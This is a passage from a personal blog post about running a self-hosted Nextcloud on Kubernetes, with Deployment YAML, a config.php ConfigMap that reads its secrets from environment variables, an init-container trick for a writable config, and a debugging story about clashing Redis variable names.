</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PORT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;{{ .Values.ports.notifyPush }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DATABASE_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">uri</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:{{ .Values.caddyVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/my-apps/nextcloud</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">400m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.caddy }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-cron</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;/usr/bin/bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/cron-scripts/webcron.sh&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/cron-scripts</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SLEEPTIME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">INITIAL_WAIT</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-data</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-webapp</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">nextcloud-webscratch</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cron-script</span>
</span></span></code></pre></div><p>The first thing to discuss is the Nextcloud configuration file, which is just
a PHP file, the <code>config.php</code>. It can be split, but I&rsquo;ve always had it all in a
single file and decided not to change that. In addition, while looking at the
<a href="https://github.com/nextcloud/docker">README of the container GitHub repo</a>, I
found that the image has some capability to do the entire configuration in
environment variables. That&rsquo;s something to look at later.
The configuration file has one big quirk: It needs to be writable by Nextcloud,
at least during updates, because it contains the Nextcloud version. Which I find
an extremely weird thing to do. This leads to the manual step of updating the
ConfigMap containing the <code>config.php</code> after an update is done.</p>
<p>Before I continue, I&rsquo;d like to thank <a href="https://transitory.social/@rachel">@rachel</a>,
who was kind enough to provide me with her Nextcloud manifests and especially
her Nextcloud config file. The most important thing those taught me was the
use of the <code>getenv</code> PHP function, so that I could provide all of the secrets
as environment variables, instead of having to construct an elaborate
external-secrets template.</p>
<p>As a consequence, my <code>config.php</code> ConfigMap now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.php</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;?php
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    $CONFIG = array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;apps_paths&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;path&#39; =&gt; &#39;/var/www/html/apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;url&#39; =&gt; &#39;/apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;writable&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        1 =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;path&#39; =&gt; &#39;/var/www/html/custom_apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;url&#39; =&gt; &#39;/custom_apps&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          &#39;writable&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;instanceid&#39; =&gt; &#39;ID&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;datadirectory&#39; =&gt; &#39;/homenet-data/data&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;objectstore&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              &#39;class&#39; =&gt; &#39;\\OC\\Files\\ObjectStore\\S3&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              &#39;arguments&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;bucket&#39; =&gt; getenv(&#39;BUCKET_NAME&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;autocreate&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;key&#39;    =&gt; getenv(&#39;AWS_ACCESS_KEY_ID&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;secret&#39; =&gt; getenv(&#39;AWS_SECRET_ACCESS_KEY&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;hostname&#39; =&gt; getenv(&#39;BUCKET_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;port&#39; =&gt; getenv(&#39;BUCKET_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;use_ssl&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                      &#39;use_path_style&#39;=&gt;true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;trusted_domains&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt; &#39;nc.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        1 =&gt; &#39;127.0.0.1&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;trusted_proxies&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        0 =&gt; &#39;127.0.0.1/32&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;memcache.local&#39; =&gt; &#39;\\OC\\Memcache\\Redis&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;redis&#39; =&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      array (
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;host&#39; =&gt; getenv(&#39;HL_REDIS_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;port&#39; =&gt; getenv(&#39;HL_REDIS_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;memcache.locking&#39; =&gt; &#39;\\OC\\Memcache\\Redis&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;user_oidc&#39; =&gt; [
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;allow_multiple_user_backends&#39; =&gt; 0,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &#39;auto_provision&#39; =&gt; false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ],
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;allow_local_remote_servers&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwrite.cli.url&#39; =&gt; &#39;https://nc.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwriteprotocol&#39; =&gt; &#39;https&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;overwritewebroot&#39; =&gt; &#39;/&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;maintenance_window_start&#39; =&gt; 100,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;default_phone_region&#39; =&gt; &#39;DE&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbtype&#39; =&gt; &#39;pgsql&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;version&#39; =&gt; &#39;30.0.6.2&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbname&#39; =&gt; getenv(&#39;HL_DB_NAME&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbhost&#39; =&gt; getenv(&#39;HL_DB_HOST&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbport&#39; =&gt; getenv(&#39;HL_DB_PORT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbuser&#39; =&gt; getenv(&#39;HL_DB_USER&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbpassword&#39; =&gt; getenv(&#39;HL_DB_PW&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;dbtableprefix&#39; =&gt; &#39;oc_&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;installed&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;maintenance&#39; =&gt; false,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;loglevel&#39; =&gt; 2,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;logfile&#39; =&gt; &#39;/dev/stdout&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;log_type&#39; =&gt; &#39;file&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_domain&#39; =&gt; &#39;example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_from_address&#39; =&gt; &#39;nextcloud&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpmode&#39; =&gt; &#39;smtp&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtphost&#39; =&gt; &#39;mail.example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpport&#39; =&gt; &#39;465&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpsecure&#39; =&gt; &#39;ssl&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpauth&#39; =&gt; true,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtpname&#39; =&gt; &#39;nc@example.com&#39;,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;mail_smtppassword&#39; =&gt; getenv(&#39;HL_MAIL_PW&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;passwordsalt&#39; =&gt; getenv(&#39;HL_PW_SALT&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;secret&#39; =&gt; getenv(&#39;HL_SECRET&#39;),
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    );</span>
</span></span></code></pre></div><p>One noteworthy piece here is the <code>trusted_domains</code> setting, which contains
not only the actual domain Nextcloud is hosted on, but also <code>127.0.0.1</code>. This is
necessary because of the cron setup I will describe later.
I find this kind of configuration setup, where I can have a config file plus
environment variables for secrets quite convenient. It lets me have an actual
config file, but it also allows me to extract the secrets without having to work
with some sort of templating.</p>
<p>Another advantage of this setup, where I can define the names of config variables,
is that I can use autogenerated Secrets directly, as you can see in the S3
setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#e6db74">&#39;objectstore&#39;</span> <span style="color:#f92672">=&gt;</span> [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;class&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#e6db74">&#39;\\OC\\Files\\ObjectStore\\S3&#39;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#39;arguments&#39;</span> <span style="color:#f92672">=&gt;</span> [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;bucket&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_NAME&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;autocreate&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;key&#39;</span>    <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;AWS_ACCESS_KEY_ID&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;secret&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;AWS_SECRET_ACCESS_KEY&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;hostname&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_HOST&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;port&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#39;BUCKET_PORT&#39;</span>),
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;use_ssl&#39;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#39;use_path_style&#39;</span><span style="color:#f92672">=&gt;</span><span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>],
</span></span></code></pre></div><p>Here I was able to define the env variables in such a way that I could just
use the ConfigMap and Secret generated by Rook via <code>envFrom</code> in the Deployment,
instead of having to define every variable individually.</p>
<p>But as I&rsquo;ve noted above, Nextcloud needs write access to the config file, so
just mounting the ConfigMap into the container is not an option, because ConfigMaps
are always mounted read-only.
So I had to reach for the typical init container trick used in these situations
and copy the config map into the webapp volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:3.21.2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/config.php&#34;</span>, <span style="color:#e6db74">&#34;/data/config/config.php&#34;</span>]
</span></span></code></pre></div><p>Next comes the Nextcloud container itself. The main thing I&rsquo;d like to point out
here is a gotcha that had me scratching my head for a little while. You can
see that I set two env variables for Redis, <code>HL_REDIS_HOST</code> and <code>HL_REDIS_PORT</code>.
When I first launched the Pod, those were called <code>REDIS_HOST</code> and <code>REDIS_PORT</code>,
which just so happen to be the same environment variables that the image uses.
It resulted in this error message:</p>
<pre tabindex="0"><code>Configuring Redis as session handler
/entrypoint.sh: 111: cannot create /usr/local/etc/php/conf.d/redis-session.ini: Permission denied
</code></pre><p>It made me pretty suspicious, because the ownership of the <code>/usr</code> hierarchy
cannot have changed between Nomad and k8s, and the container was running with
the same UID/GID as it was in the Nomad cluster. So why was I suddenly seeing
this permission issue? I rummaged a bit through the <a href="https://github.com/nextcloud/docker/blob/master/docker-entrypoint.sh">Docker entrypoint</a>
of the image and found that the error message was coming from this piece of
code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;Configuring Redis as session handler&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            file_env REDIS_HOST_PASSWORD
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#39;session.save_handler = redis&#39;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># check if redis host is an unix socket path</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span>$REDIS_HOST<span style="color:#e6db74">&#34;</span> | cut -c1-1<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;unix://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">?auth=</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;unix://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># check if redis password has been set</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD+x<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;tcp://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>REDIS_HOST_PORT:=6379<span style="color:#e6db74">}</span><span style="color:#e6db74">?auth=</span><span style="color:#e6db74">${</span>REDIS_HOST_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                echo <span style="color:#e6db74">&#34;session.save_path = \&#34;tcp://</span><span style="color:#e6db74">${</span>REDIS_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>REDIS_HOST_PORT:=6379<span style="color:#e6db74">}</span><span style="color:#e6db74">\&#34;&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.locking_enabled = 1&#34;</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.lock_retries = -1&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># redis.session.lock_wait_time is specified in microseconds.</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># Wait 10ms before retrying the lock rather than the default 2ms.</span>
</span></span><span style="display:flex;"><span>            echo <span style="color:#e6db74">&#34;redis.session.lock_wait_time = 10000&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span> &gt; /usr/local/etc/php/conf.d/redis-session.ini
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>That sets up some Redis configurations, and I invariably ran into this because
I named my env variables the same as the image&rsquo;s.
The error went away when I renamed the env variables to have the <code>HL_</code> prefix,
so didn&rsquo;t hit the <code>if</code> above anymore.</p>
<p>Additionally noteworthy is the fact that the Nextcloud container doesn&rsquo;t expose
any port, only the
Caddy web server does, which will proxy all requests targeting PHP files to the
Nextcloud container.</p>
<p>That Caddy container looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:{{ .Values.caddyVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webapp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/my-apps/nextcloud</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">webscratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
